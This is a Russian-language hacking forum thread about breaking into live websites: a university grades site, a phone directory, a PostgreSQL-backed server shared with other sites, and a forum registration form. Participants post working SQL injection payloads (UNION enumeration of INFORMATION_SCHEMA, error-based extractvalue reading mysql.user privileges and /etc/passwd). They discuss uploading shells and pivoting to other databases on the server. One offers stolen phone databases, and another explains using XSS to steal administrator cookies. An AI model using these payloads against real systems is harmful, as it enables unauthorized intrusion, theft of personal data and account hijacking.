Что можно сделать с этим http://avn.kstu.kg Этот сайт предназначен для нашего университета. Там вся информация успеваемости студентов (Баллы, зачеты и т.д) Хотел бы сделать с этим сайтом что-то, но не знаю что с ним можно сделать? Для примера возьмем эту http://avn.kstu.kg/ReportServer/Pages/ReportViewer.aspx?/VUZ/s_f21_2&rs:Command=Render где описано ФИО студентов и ихние баллы.
пропустил, что 5.3, спасибо l1ght тогда вариантов, кроме как создать файл во внедоступной снаружи папке или неисполняемый, или через соседей - нет
Добрый вечер господа! Буду признателен, если сможете мне подсказать. Нашел SQL инъекцию на ресурсе (телефонный справочник), есть форма заполнения ФИО или номер телефона, собственно в ней и уязвимость. Строка запроса получается так выглядит: /filename?fio=fio&telefon=123 Уязвимость присутствует в обоих переменных, при подставлении ' выходит следующее: Bad SQL-query: SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123'%' LIMIT 0, 10 Mistake Пытаюсь раскрутить стандартным образом: /filename?fio=fio&telefon=123%27+order+by+1-- В ответ получаю следующее: Bad SQL-query: SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123' order by 1--%' LIMIT 0, 10 Mistake Долго тупил, пробовал как то отбросить окончание запроса %' LIMIT 0, 10, которое автоматически подставлялось, но безуспешно. Потом я осознал, что можно зайти несколько иным способом, поскольку подставляемое окончание запроса портило мне все карты, я разделил этот запрос, в конечном итоге прихожу к следующему запросу: /filename?fio=&telefon=955448%27+union+select+1,2,3+union+SELECT+*+FROM+piter+WHERE+fio+LIKE+%27-as Запрос прошел, отобразив мне выводимые поля, но я столкнулся с сложностью при переборе имен таблиц. Ресурс выводит на страницу не более 10 записей из БД, иначе пишет, что найдено слишком много записей уточните запрос. Но при составлении следующего запроса: /filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM+INFORMATION_SCHEMA.TABLES+union+SELECT+*+FROM+piter+WHERE+fio+LIKE+%27-as Получаю следующее: По вашему запросу найдено слишком много результатов (286). Пожалуйста, уточните ваш запрос. Mistake Я так понимаю, запрос проходит без ошибки, он выделять имена столбцов (следуя из ответа сервера их около 280), но сам PHP скрипт на сервере не дает вывести их, так как в PHP скрипте в цикле идет проверка на размер массива и если он более 10 элементов, выводит вышеописанную ошибку. Казалось бы чего сложного, можно перебрать поштучно используя LIMIT: /filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+union+SELECT+*+FROM+piter+WHERE+fio+LIKE+%27-as По логике он должен выбрать одну запись из БД и отобразить ее, но в ответ я получаю следующее: По вашему запросу найдено слишком много результатов (319). Пожалуйста, уточните ваш запрос. Mistake Кол-во выбранных записей из БД не то что бы уменьшилось, а наоборот даже несколько увеличилось. Подскажите, где я ошибаюсь? п.с. К сожалению сам ресурс с уязвимостью в открытую палить не хочу, но если кому интересны телефонные базы, пишите в личку поделюсь всей инфой Коллеги, заранее благодарен!!)
Спасибо, сегодня попробую, отпишусь. Пользуясь случаем еще один вопрос задам. Есть сайт, простенький, СУБД PostgreSQL. На сервере еще 4 сайта, к которым и есть основной интерес. Сайт дырявый капец, SQL инъекция на инъекции. Но вот в чем проблема, какой то толковой админки не нашел, залить шелл через инъекцию не получается я так понимаю (сам код в БД вносит, но файл создавать не хочет, выдает ошибку). Собственно совсем отчаялся, всю БД прошерстил, ничего интересного, шелл не залить (только картинкой, но локального инклуда нет, залить .htaccess тоже не получается). Подскажите, а возможно как то в ходе инъекции сделать запрос в другую БД на сервере? Понятно, что это зависит от прав пользователя, не понимаю как сам запрос в таком случае составить.
PostgreSQL 9.1.16 on x86_64-unknown-linux-gnu, compiled by gcc-4.7.real (Debian 4.7.2-5) 4.7.2, 64-bit
ArmusIAm, отвечая на вопрос, один результат тебе дает первый query "955448' " и сотни последний " LIKE '%' " можно конечно и дальше шаманить с длинными или сложными запросами (1=0, error-based, blind, ;%00) только в твоем случае все гораздо проще цитата с документации
Только если вы контролируете два поля подряд, sql_mode дефолтный и magic_quote = off. Field_1 = test\ Field_2 = UNION SELECT ... -- Нет, это необходимая и достаточная фильтрация.
всем привет . помогите человеки добрые 'or extractvalue(0x0a,concat(0x0a,(select user())))and'# как проверить права юзера 'or extractvalue(0x0a,concat(0x0a,(select file_priv))) from+mysql.user and'# даёт ошибку синтекса. extractvalue(0x0a,concat(0x0a,(select load_file('/etc/passwd'))))and' Method Not Implemented GET to /view_cat.php not supported. могу сайт кинуть. Хочецо научицо . а то sqlХРАП как слепые крутит
Code: 'or(extractvalue(1,concat(0x3a,(select(file_priv)from(mysql.user)where(user='BabaDook')limit+0,1))))and'
Подскажите что можно сделать с этим? когда я вместо ника пишу <?php phpinfo(); ?> Вот ошибка SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,myid,myidkey,regip,regdate,lastloginip,lastlogintime,salt,secques) VALUES (28472, '<?php phpinfo(); ?> ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '') Error: Duplicate entry ' Errno.: 1062 Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))
Скорее всего это XSS уязвимость. Выполняться будут HTML и Javascript, PHP интерпретироваться не будет. Уязвимость можно использовать для получения куки администратора или других пользователей, используя их можно зайти под их аккаунтом на сайт. Ошибка говорит о том, что в таблице есть поле с уникальным значением и данный запрос ее дублирует. При добавке данных скрипт грубо говоря хочет вложить дважды одно и тоже значение в это поле. Ошибка возникает только при данном логине? Если да, то видимо это поле и является уникальным, и записать еще одну запись с тем же логином сервер не может. Вообщем по экспериментируй с теми данными, что заполняешь.